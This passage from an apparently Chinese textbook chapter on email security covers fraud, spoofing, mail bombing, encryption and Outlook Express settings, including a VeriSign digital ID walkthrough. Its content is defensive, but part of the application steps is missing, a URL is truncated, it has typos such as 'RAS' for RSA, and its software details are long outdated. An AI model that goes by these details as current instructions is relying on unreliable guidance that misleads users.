應(yīng)該特別注意的風(fēng)險(xiǎn)。這些行為不是新花樣，而是以前那種普通郵信、贈(zèng)券之類搞詐騙的伎倆在Internet上的翻版。Web強(qiáng)大的功能和它在整個(gè)世界市場上的傳播力，在為人們創(chuàng)造利益的同時(shí)，也會(huì)引起一些不法分子的青睞。有的發(fā)布廣告，鼓勵(lì)消費(fèi)者向通信技術(shù)投資，許諾高回報(bào)和低風(fēng)險(xiǎn)；有的在Web上散布假金融服務(wù)，制造高科技投資機(jī)會(huì)；有的還招攬競賭客戶，通過Web在其他國家轄區(qū)的服務(wù)器上參加賭博；有的甚至散發(fā)信用維護(hù)服務(wù)廣告，騙取錢財(cái)?shù)取nternet是一個(gè)開放的系統(tǒng)，接納好人也接納壞人，真?zhèn)尾⒋?。瀏覽器或Web服務(wù)器都面臨著欺詐的風(fēng)險(xiǎn)。認(rèn)識(shí)到這一事實(shí)，慎重對待所有潛在客戶在網(wǎng)頁上的廣告和可能發(fā)布的E-mail。(4)利用E-mail欺騙E-mail欺騙行為，表現(xiàn)形式各異，但原理基本相同。它通常是騙用戶進(jìn)行一個(gè)毀壞性的操作或者暴露敏感信息，如口令等。欺騙性E-mail會(huì)制造安全漏洞。E-mail欺騙行為的表現(xiàn)如下：①E-mail宣稱來自系統(tǒng)安全管理員，要求用戶將他們的口令改變?yōu)樘囟ǖ淖址?，并威脅如果用戶不照此辦理，將關(guān)閉用戶賬號(hào)。②E-mail宣稱來自上級(jí)管理員，要求用戶提供口令或其他敏感信息。由于簡單郵件傳輸協(xié)議(SMTP)沒有驗(yàn)證系統(tǒng)，偽造E-mail十分方便。如果站點(diǎn)允許任何人都可以與SMTP端口聯(lián)系，并可以用虛構(gòu)某人的名義發(fā)出E-mail。黑客在發(fā)出欺騙性的E-mail的同時(shí)，還可能修改相應(yīng)的Web瀏覽器界面，所以應(yīng)花一些時(shí)間查看E-mail的錯(cuò)誤信息，其中經(jīng)常會(huì)有闖入者的線索。應(yīng)該查看E-mail信息的抬頭，如果E-mail閱讀器不允許用戶查看這些臺(tái)頭，則查看包含原始信息的ACSII文件。要小心這些抬頭，這些抬頭經(jīng)常被偽造。如果懷疑自己已被黑客入侵過，可以與計(jì)算機(jī)緊急應(yīng)急小組(CERT)聯(lián)系(cert＠)，向他們描述自己的狀況。還可以查看在相關(guān)安全站點(diǎn)以獲取詳細(xì)資料.(5)電子郵件轟炸電子郵件轟炸可以描述為不停地接到大量的、同一內(nèi)容的電子郵件。一條信息可能被傳給成千上萬的不斷擴(kuò)大的用戶。主要風(fēng)險(xiǎn)來自電子郵件服務(wù)器，如果服務(wù)器很多，服務(wù)器會(huì)脫網(wǎng)，甚至導(dǎo)致系統(tǒng)崩潰。系統(tǒng)不能服務(wù)的原因很多，可能由于網(wǎng)絡(luò)連接超載，也可能由于缺少系統(tǒng)資源。對付電子郵件轟炸可以借助防火墻，阻止惡意信息產(chǎn)生和或者過濾掉躍躍欲試的電子郵件，以確保所有的外部的SMTP只連接到電子郵件服務(wù)器上，而不連接到站點(diǎn)的其他系統(tǒng)上；從而將電子郵件轟炸的損失減小到最小。如果發(fā)現(xiàn)站點(diǎn)正遭受侵襲，試著找出轟炸的來源，再用防火墻進(jìn)行過濾。3.E-mail的安全措施為提高電子郵件安全，可在郵件服務(wù)器上建立電子郵件的安全模式，將安全策略施加給安全模式，進(jìn)而對電子郵件傳輸進(jìn)行安全控制。可以采取以下的安全措施：(1)借助防火墻對進(jìn)入郵件服務(wù)器的電子郵件進(jìn)行控制，過濾、篩選和屏蔽掉那些有害的電子郵件或?yàn)V去那些郵件地址或郵件中有風(fēng)險(xiǎn)的字符，并預(yù)防黑客攻擊。(2)對于重要的電子郵件可以加密傳送，并進(jìn)行數(shù)字簽名。加密的算法很多，如RAS加密、PGP加密，還可用IDEA或DES加密。目前在Internet上傳送的電子郵件，多采用PGP加密傳送，并同時(shí)進(jìn)行數(shù)字簽名。加密時(shí)使用公開的密鑰加密，在收信端用秘密密鑰進(jìn)行解密。用秘密密鑰進(jìn)行數(shù)字簽名，用公開密鑰進(jìn)行數(shù)字簽名驗(yàn)證。(3)采用必要措施防范和解除郵件炸彈以及郵件垃圾，使這些郵件不占用郵箱的空間，以免干擾用戶接收正常的郵件，減少郵件使用費(fèi)用。(4)檢查電子郵件的來源，進(jìn)行郵件完整性檢測，查看郵件是否被非法更改。(5)檢查電子郵件是否感染病毒，以便采用相應(yīng)的方法進(jìn)行診斷和消除。(6)黑客攻擊具有一定的目的性，往往借助以電子郵件來實(shí)現(xiàn)其險(xiǎn)惡用心。例如，黑客在電子郵件中使用損害服務(wù)器的命令。Morrosbug內(nèi)就有一種會(huì)損壞sendmail的指令，這個(gè)指令可以使用戶執(zhí)行黑客發(fā)出的命令。要注意登錄的文件和郵件及特殊日期，發(fā)現(xiàn)黑客后，切斷聯(lián)系，分析問題，采取行動(dòng)，修復(fù)安全漏洞，并恢復(fù)系統(tǒng)。8.3.2OutlookExpress的安全OutlookExpress是微軟公司出品的一個(gè)基于Internet標(biāo)準(zhǔn)的電子郵件和新聞閱讀程序，由于它是Windows的一個(gè)組件，使用的用戶非常多，這一節(jié)將介紹OutlookExpress的安全性。要使用OutlookExpress系統(tǒng)閱讀電子郵件，必須使用支持SMTP和POP或者IMAP和MIME，HTTP協(xié)議的郵件系統(tǒng)。一般的郵件服務(wù)器都支持這些協(xié)議，如Foxmail、Sina和263郵局等。1.OutlookExpress的安全設(shè)置OutlookExpress為了保護(hù)郵件的安全，使用了加密等手段，不過這些設(shè)置不是默認(rèn)設(shè)置的，要用戶自己添加，下面就介紹這些設(shè)置。(1)啟動(dòng)Outlook→菜單中選擇“工具”→“選項(xiàng)”，出現(xiàn)Outlook的設(shè)置對話框，然后選擇“安全”選項(xiàng)卡，如圖8.6所示。圖8.6(2)在“安全區(qū)域”框中，用戶可以選擇兩個(gè)選項(xiàng)。Internet區(qū)域用戶可以使用整個(gè)Intemet網(wǎng)上的所有地址的郵箱。受限站點(diǎn)區(qū)域用戶使用的郵箱必須是在指定的IP地址范圍內(nèi)，用戶可以在IE中設(shè)置指定的IP地址范圍。(3)在“安全郵件”框中，要求用戶使用數(shù)字證書，這是一個(gè)高級(jí)使用，只有在對郵件的安全要求很高的情況下才可能需要使用這種加密手段。2.定義接收郵件的規(guī)則用戶可以定義對符合一定規(guī)定的郵件的操作，這些規(guī)定就是“郵件規(guī)則”。“郵件規(guī)則”可以使用戶排除郵件垃圾、防止惡意郵件、除去指定的發(fā)件人發(fā)的郵件等功能。使用戶的郵件處于安全保護(hù)之下。(1)單擊菜單中的“工具”→“郵件規(guī)則”，出現(xiàn)“新建郵件規(guī)則”對話框，如圖8.7所示。這個(gè)對話框的界面說明如下：圖8.7選擇規(guī)則條件即當(dāng)郵件符合下列某一條規(guī)則時(shí)，啟動(dòng)所指定的對郵件的操作。選擇規(guī)則操作定義當(dāng)郵件符合指定的規(guī)則時(shí)所啟動(dòng)的操作。規(guī)則說明定義每個(gè)規(guī)則特定的屬性。規(guī)則名稱用戶可以在同一個(gè)規(guī)則中使用幾個(gè)“郵件規(guī)則條件”，并在這個(gè)編輯框中輸入指定的規(guī)則名稱。(2)用戶要定義郵件規(guī)則時(shí)，首先定義郵件規(guī)則條件。例如，選擇“若發(fā)件人中包含用戶”規(guī)則條件，就單擊它前面的復(fù)選框。(3)在“規(guī)則說明”中將出現(xiàn)用戶設(shè)置的規(guī)則條件，如圖8.8所示。圖8.8(4)單擊藍(lán)色的“包含用戶”鏈接，出現(xiàn)“選擇用戶”對話框，如圖8.9所示。(5)用戶可以在這個(gè)對話框中輸入指定的用戶名或者單擊“通訊簿”按鈕，在出現(xiàn)的對話框中選擇用戶。(6)用戶選擇好發(fā)件人后，可以單擊“添加”按鈕，將發(fā)件人添加到列表中。(7)在“選擇規(guī)則操作”窗口中選擇對郵件采取的動(dòng)作。在上述的例子中，就是當(dāng)用戶收到指定的用戶名發(fā)的郵件時(shí)對這個(gè)郵件采取的動(dòng)作。如用戶可以選擇“刪除”按鈕。這樣，這個(gè)用戶發(fā)來的郵件就會(huì)被自動(dòng)刪除。圖8.9(8)最后在“規(guī)則名稱”中輸入規(guī)則名稱，再單擊“確定”按鈕，出現(xiàn)“郵件規(guī)則”對話框，如圖8.10所示。圖8.10(9)用戶可以看到這個(gè)規(guī)則已經(jīng)添加到列表中了。單擊“馬上應(yīng)用”按鈕，這個(gè)規(guī)則就開始使用了。在郵件規(guī)則中，用戶可以設(shè)置多種規(guī)則保護(hù)自己的電子郵件安全。其中包括防止大郵件的入侵，防止惡意郵件的發(fā)生、防止郵件的擴(kuò)散等強(qiáng)大的功能，用戶只要知道了郵件規(guī)則的設(shè)置，可以自己在使用中應(yīng)用這些規(guī)則，保證自己郵箱的安全。3.郵件加密在OutlookExpress中可以通過數(shù)字簽名來證明用戶郵件的身份，即讓對方確信該郵件是由發(fā)送方的機(jī)器發(fā)送的。OutlookExpress同時(shí)提供郵件加密功能，使用戶的郵件只有預(yù)定的接收者才能接收并閱讀它們，但前提是用戶必須先獲得對方的數(shù)字標(biāo)識(shí)。要對郵件進(jìn)行數(shù)字簽名必須首先獲得一個(gè)私人的數(shù)字標(biāo)識(shí)(digitalID,發(fā)送方的數(shù)字身份證)。所謂數(shù)字標(biāo)識(shí)是指由獨(dú)立的授權(quán)機(jī)構(gòu)發(fā)放的證明用戶在Internet上身份的證件，即用戶在Internet上的身份證。這些發(fā)證的商業(yè)機(jī)構(gòu)將發(fā)放給用戶這個(gè)身份證并不斷效驗(yàn)其有效性。用戶首先向這些公司申請數(shù)字標(biāo)識(shí)，然后就可以利用這個(gè)數(shù)字標(biāo)識(shí)對自己寫的郵件進(jìn)行數(shù)字簽名。如果獲得了接收方的數(shù)字標(biāo)識(shí)，那么用戶就可以給他發(fā)送加密郵件。(1)數(shù)字標(biāo)識(shí)的工作原理數(shù)字標(biāo)識(shí)由“公用密鑰”、“私人密鑰”和“數(shù)字簽名”等3部分組成。你通過對發(fā)送的郵件進(jìn)行數(shù)字簽名可以把你的數(shù)字標(biāo)識(shí)發(fā)送給他人，這時(shí)他們收到的實(shí)際上是公用密鑰，以后他們就可以通過這個(gè)公用密鑰對發(fā)給你的郵件進(jìn)行加密，你再在OutlookExpress中使用私人密鑰對加密郵件進(jìn)行解密和閱讀。數(shù)字標(biāo)識(shí)的數(shù)字簽名部分是你的電子身份卡，數(shù)字簽名可使收件人確信郵件是你發(fā)送的，并且未被偽造或篡改。(2)數(shù)字標(biāo)識(shí)的申請和使用既然數(shù)字標(biāo)識(shí)有這么大的作用，那么不掏點(diǎn)銀子是不太現(xiàn)實(shí)的(每年才9.95美元)，不過可以先申請一個(gè)的數(shù)字標(biāo)識(shí)感受一下。目前在Internet上有較多的數(shù)字標(biāo)識(shí)商業(yè)發(fā)證機(jī)構(gòu)，其中VeriSign公司是Microsoft的首選數(shù)字標(biāo)識(shí)提供商。通過VeriSign的特別饋贈(zèng)，MicrosoftInternetExplorer4.0用戶均可獲得一個(gè)使用60天的數(shù)字標(biāo)識(shí)。向該公司申請的方法如下：止，注意該口令不能包含標(biāo)點(diǎn)。還有一項(xiàng)“PaymentInformation”是針對收費(fèi)用戶的，如果申請者在前面選的是“I'dlikeafree60daytrialDigitalID”即先試用60天，則此項(xiàng)不填。確認(rèn)無誤并提交后，過一會(huì)兒就會(huì)收到一封Verisign公司發(fā)來的電子郵件，其中就包含數(shù)字標(biāo)識(shí)PIN。在一般情況下只需簡單地按最后那個(gè)“NEXT”按鈕就可以繼續(xù)了，不過有時(shí)可能會(huì)提示上一頁面錯(cuò)誤(筆者就曾遇到)，建議直接將回信末尾提供的PIN記下來，然后到s://digitalid.verisign/getidoutlook.htm去繼續(xù)下一步。這時(shí)只需在要求輸入DigitalIDPIN的框內(nèi)輸入已經(jīng)收到的PIN然后單擊“Retrievebutton”即可。如果一切順利的話，這時(shí)將開始安裝你的數(shù)字標(biāo)識(shí)到本機(jī)的OutlookExpress中，這次的申請也大功告成了！(3)對郵件進(jìn)行數(shù)字簽名獲得數(shù)字標(biāo)識(shí)以后，就可以通過OutlookExpress很容易地對自己所發(fā)送的電子郵件進(jìn)行數(shù)字簽名。如果希望對所有待發(fā)的郵件都進(jìn)行數(shù)字簽名，請選擇“工具”→“選項(xiàng)”→“安全”選項(xiàng)頁，在“在所有待發(fā)郵件中添加數(shù)字簽名”檢查框前面打上勾選中即可，如圖8.6所示。如果只希望對某一封郵件進(jìn)行數(shù)字簽名的話，只需在撰寫郵件時(shí)將“數(shù)字簽名郵件”按鈕(如圖8.11所示)按下即可。當(dāng)對郵件數(shù)字簽名以后，該郵件將出現(xiàn)簽名圖標(biāo)，數(shù)字